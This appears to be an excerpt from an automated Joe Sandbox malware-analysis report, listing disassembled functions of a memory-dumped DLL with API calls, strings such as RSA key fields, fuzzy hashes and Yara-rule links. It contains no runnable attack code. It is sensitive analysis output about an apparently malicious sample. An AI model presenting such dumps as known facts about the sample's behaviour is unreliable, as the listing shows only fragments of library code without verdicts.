
Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSa
API String ID: 4225690600-3169278968
Opcode ID: c14185d0b11b927388dad340df8131d80fbb479b90131b22ede35f3773504d38
Instruction ID: b2d4ac641b9a3d2ec6f33764411720572a25a3c6449c9a6f696e086341d9e03c
Opcode Fuzzy Hash: c14185d0b11b927388dad340df8131d80fbb479b90131b22ede35f3773504d38
Instruction Fuzzy Hash: 41314970A116089FCB00CFA9CD84B9EB7F9AF89314F20859AE418EB651CB75EE418F50

Function 6CF2012D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF223B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2240F

Strings

RS:h, xrefs: 6CF2017F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RS:h
API String ID: 4225690600-3891202347
Opcode ID: e3e27d00eebbd6272224ffaddd9a0f19e4faae28e0168ead71db86396c56103e
Instruction ID: 9255fe654910424c92c06c116ee380ebd3167c7080ae94bdea86f57bfd0fcca4
Opcode Fuzzy Hash: e3e27d00eebbd6272224ffaddd9a0f19e4faae28e0168ead71db86396c56103e
Instruction Fuzzy Hash: C6313C70E016089FDB00CFA9CC84B9EB7F9AF89214F208596E419E7652CB75DD41CF50

Function 6CF20237 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF223B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2240F

Strings

RS3g, xrefs: 6CF20286

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RS3g
API String ID: 4225690600-2794631155
Opcode ID: 5d6b00b80e421b9c2f1aa27d86a7be50b3041cf2b22446c90fdc70b0227ee192
Instruction ID: 2919366194c5a089f0d3a44796aadd5d991fc52430bad5318c87e99593984766
Opcode Fuzzy Hash: 5d6b00b80e421b9c2f1aa27d86a7be50b3041cf2b22446c90fdc70b0227ee192
Instruction Fuzzy Hash: 49313B71A116189FCB00CFA9CD84B9EB7F9AF89214F208696E418E7651CB75DD41CF50

Function 6CF5C760 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 95COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6CF5C7EB

Strings

MultiplicativeInverseOfPrime2ModPrime1, xrefs: 6CF5C815
ModPrime1PrivateExponent, xrefs: 6CF5C840
Prime1, xrefs: 6CF5C88A
PrivateExponent, xrefs: 6CF5C85F
ModPrime2PrivateExponent, xrefs: 6CF5C82C
Prime2, xrefs: 6CF5C876

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: type_info::operator!=
String ID: ModPrime1PrivateExponent$ModPrime2PrivateExponent$MultiplicativeInverseOfPrime2ModPrime1$Prime1$Prime2$PrivateExponent
API String ID: 2241493438-339133643
Opcode ID: fb91e3da159433d51c25001db45e92855cacedc30a26d7a1467791c8040ed7d8
Instruction ID: 149b7206b018358ccf0de6cb8600b96c84605558685af4d6f9883c24734c0eb0
Opcode Fuzzy Hash: fb91e3da159433d51c25001db45e92855cacedc30a26d7a1467791c8040ed7d8
Instruction Fuzzy Hash: C731AE71A153408EC7049F78D84158EBBF1AFE5604F814A2EF5449BB20EB71D958CB82

Function 6CF20457 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF223B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2240F

Strings

RS%e, xrefs: 6CF20494

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RS%e
API String ID: 4225690600-1409579784
Opcode ID: 8aa535370b684f0187e5b8fa482d121ddf91a61d43fd065277d41f217391b141
Instruction ID: 7b57de8d0327ba6494ca65ac846abd4b63273063d0eb4b3c4d5a89fd90c29d84
Opcode Fuzzy Hash: 8aa535370b684f0187e5b8fa482d121ddf91a61d43fd065277d41f217391b141
Instruction Fuzzy Hash: F23149B0E116189FCB10CBA9CC84B9DB7BAAF89314F24859AE418E7652CB76DD408F50

Function 6CF1AA00 Relevance: 12.3, APIs: 8, Instructions: 309COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CF1AA54
VariantInit.OLEAUT32(?), ref: 6CF1AA5B
VariantInit.OLEAUT32(?), ref: 6CF1AA62
VariantInit.OLEAUT32(?), ref: 6CF1AA69
VariantClear.OLEAUT32(?), ref: 6CF1ACF2
VariantClear.OLEAUT32(?), ref: 6CF1ACF9
VariantClear.OLEAUT32(?), ref: 6CF1AD00
VariantClear.OLEAUT32(?), ref: 6CF1AD07

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: 972d37561b3ee9d35bae5552376ca5ce190be8165e91f3b740a89050b6935804
Instruction ID: 1e76340c4bbc173520e71d5608314f61e31ed6523dddfff787f8261a10854945
Opcode Fuzzy Hash: 972d37561b3ee9d35bae5552376ca5ce190be8165e91f3b740a89050b6935804
Instruction Fuzzy Hash: D5C137716087409FC300DF68C880A5BBBE6FFC8704F248A4DE5989BB65D775E949CB92

Function 6CF19D00 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF19DEB
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF19DFB
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF19E29
SafeArrayDestroy.OLEAUT32(?), ref: 6CF19F25
VariantClear.OLEAUT32(?), ref: 6CF19FE5

Strings

@, xrefs: 6CF19DD7

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArraySafe$Bound$ClearDestroyElementVariant
String ID: @
API String ID: 3214203402-2766056989
Opcode ID: b2d967f273eb62fdf790e2631b0b66dbf05e4555e2c936f1e0d4f2c92d7233b9
Instruction ID: 047a356e28052504a5200043b957bfed3b2a5dc12bd715cc08a8670c57093af9
Opcode Fuzzy Hash: b2d967f273eb62fdf790e2631b0b66dbf05e4555e2c936f1e0d4f2c92d7233b9
Instruction Fuzzy Hash: B2D15B71D05249DFDB00DFA8C880AADBBB5FF48308F64816DE515ABB54DB31AA49CF90

Function 6CF1B300 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF1B3EB
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF1B3FB
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF1B429
SafeArrayDestroy.OLEAUT32(?), ref: 6CF1B525
VariantClear.OLEAUT32(?), ref: 6CF1B5E5

Strings

@, xrefs: 6CF1B3D7

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArraySafe$Bound$ClearDestroyElementVariant
String ID: @
API String ID: 3214203402-2766056989
Opcode ID: d92fc21857da18be6c243d5c69f0e3e24af94ab360d394be663871bd8c0f3d15
Instruction ID: 8c07660ef84d19377cafabde244d2db5ac2d2985e1ec6a4b8de50aad5d154e94
Opcode Fuzzy Hash: d92fc21857da18be6c243d5c69f0e3e24af94ab360d394be663871bd8c0f3d15
Instruction Fuzzy Hash: 59D16CB1E05249CFDB00DFA9C880AADBBB5FF48308F64859DE515ABB54D730AA45CF90

Function 6CF41580 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 277COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CF416B2

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

__CxxThrowException@8.LIBCMT ref: 6CF4180A

Part of subcall function 6CF04010: std::_Xinvalid_argument.LIBCPMT ref: 6CF0402A

Strings

: this key is too short to encrypt any messages, xrefs: 6CF4162A
: message length of , xrefs: 6CF4170D
for this public key, xrefs: 6CF41771
exceeds the maximum of , xrefs: 6CF4173F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaiseXinvalid_argumentstd::_
String ID: exceeds the maximum of $ for this public key$: message length of $: this key is too short to encrypt any messages
API String ID: 3807434085-412673420
Opcode ID: 8e3090c85778a1e084c1dc8e3f8494eace2cbfbb39522115ebb52f1694d11237
Instruction ID: 4cc5a4b57d3d9a101b516e1edba74e8acbe10949fd72f8cea0a8deff282fa867
Opcode Fuzzy Hash: 8e3090c85778a1e084c1dc8e3f8494eace2cbfbb39522115ebb52f1694d11237
Instruction Fuzzy Hash: 37B14A716083809FD320DB69D890FDBBBE9AFD9314F04891DE59D83751DB70A9098BA3

Function 6CF61250 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CF6126E

Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF690ED
Part of subcall function 6CF690D8: __CxxThrowException@8.LIBCMT ref: 6CF69102
Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF69113

_memmove.LIBCMT ref: 6CF612E0
_memmove.LIBCMT ref: 6CF61305
_memmove.LIBCMT ref: 6CF61342
_memmove.LIBCMT ref: 6CF6135F

Strings

deque<T> too long, xrefs: 6CF61269

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 4034224661-309773918
Opcode ID: 81f812797bf194a2f770597be21741e7a5eb677116c945ba22b410f022ffa3af
Instruction ID: 4d0b0d2e1513e934cf0d57983b7e48f9027a7efad381857fc5c90ecd4fca0274
Opcode Fuzzy Hash: 81f812797bf194a2f770597be21741e7a5eb677116c945ba22b410f022ffa3af
Instruction Fuzzy Hash: 67410472A042009BD704CF29CC91A6BB7E6EBC4314F1DCA2CE809D7F45EA35ED0987A1

Function 6CF613A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CF613BE

Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF690ED
Part of subcall function 6CF690D8: __CxxThrowException@8.LIBCMT ref: 6CF69102
Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF69113

_memmove.LIBCMT ref: 6CF61431
_memmove.LIBCMT ref: 6CF61456
_memmove.LIBCMT ref: 6CF61493
_memmove.LIBCMT ref: 6CF614B0

Strings

deque<T> too long, xrefs: 6CF613B9

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 4034224661-309773918
Opcode ID: 8d8393c7826d97a9f2c068fc149d5144992272bb217a6cd002ac01a8b6f61cb0
Instruction ID: 15a1c9553bb7e4b8892146d0c9c3f4788639e9d9c1ea586c348db9a4049667d9
Opcode Fuzzy Hash: 8d8393c7826d97a9f2c068fc149d5144992272bb217a6cd002ac01a8b6f61cb0
Instruction Fuzzy Hash: 6741E472A042048BC704CF29DC91A6BB7E6EBC4214F19C62DE84AD7F44EA35ED09C7A1

Function 6CF04D90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CF04DA9

Part of subcall function 6CF69125: std::exception::exception.LIBCMT ref: 6CF6913A
Part of subcall function 6CF69125: __CxxThrowException@8.LIBCMT ref: 6CF6914F
Part of subcall function 6CF69125: std::exception::exception.LIBCMT ref: 6CF69160

std::_Xinvalid_argument.LIBCPMT ref: 6CF04DCA
std::_Xinvalid_argument.LIBCPMT ref: 6CF04DE5
_memmove.LIBCMT ref: 6CF04E4D

Strings

string too long, xrefs: 6CF04DC5, 6CF04DE0
invalid string position, xrefs: 6CF04DA4

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: cbd7c61176adde4e3f85b7362165286bf55e242ebbbeee9a767d60fa9de3cb21
Instruction ID: c6286253a525221df8c84f663fefc0d1f6716399396638db9d180574a9a83a52
Opcode Fuzzy Hash: cbd7c61176adde4e3f85b7362165286bf55e242ebbbeee9a767d60fa9de3cb21
Instruction Fuzzy Hash: 1631C8323052119FD7248F6CE8A0BAAFBE5EBA0B65B204A2EE551CBF40D771D844D791

Function 6CF744E9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6CF74532
DName::operator+.LIBCMT ref: 6CF74539
DName::DName.LIBCMT ref: 6CF7455B
DName::operator+.LIBCMT ref: 6CF74562
DName::operator+.LIBCMT ref: 6CF74569

Strings

throw(, xrefs: 6CF7452A, 6CF74553

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Name::operator+$NameName::
String ID: throw(
API String ID: 168861036-3159766648
Opcode ID: b774a3b5d5da6407c1110c8f5b2860eed9266e9d416bd4de9d1bac1d26508ae8
Instruction ID: 3547f98c18cc34ca9fd4035afb1020495e747a8c61ff889c46065a1798ab1347
Opcode Fuzzy Hash: b774a3b5d5da6407c1110c8f5b2860eed9266e9d416bd4de9d1bac1d26508ae8
Instruction Fuzzy Hash: 08019274A00109BFCF14DFA8E841DEE7BB9EF44708F004156E9019B7A4DB71D94A8BA0

Function 6CF6CCF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 6CF6CCFA

Part of subcall function 6CF6EA6D: GetLastError.KERNEL32(?,?,6CF6D7DD,6CF69DEF,00000000,?,6CF69BD4,6CF01290,A64A5C11), ref: 6CF6EA71
Part of subcall function 6CF6EA6D: ___set_flsgetvalue.LIBCMT ref: 6CF6EA7F
Part of subcall function 6CF6EA6D: __calloc_crt.LIBCMT ref: 6CF6EA93
Part of subcall function 6CF6EA6D: DecodePointer.KERNEL32(00000000,?,?,6CF6D7DD,6CF69DEF,00000000,?,6CF69BD4,6CF01290,A64A5C11), ref: 6CF6EAAD
Part of subcall function 6CF6EA6D: GetCurrentThreadId.KERNEL32 ref: 6CF6EAC3
Part of subcall function 6CF6EA6D: SetLastError.KERNEL32(00000000,?,?,6CF6D7DD,6CF69DEF,00000000,?,6CF69BD4,6CF01290,A64A5C11), ref: 6CF6EADB

__calloc_crt.LIBCMT ref: 6CF6CD1C
__get_sys_err_msg.LIBCMT ref: 6CF6CD3A
_strcpy_s.LIBCMT ref: 6CF6CD42
__invoke_watson.LIBCMT ref: 6CF6CD57

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 6CF6CD07, 6CF6CD2A

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
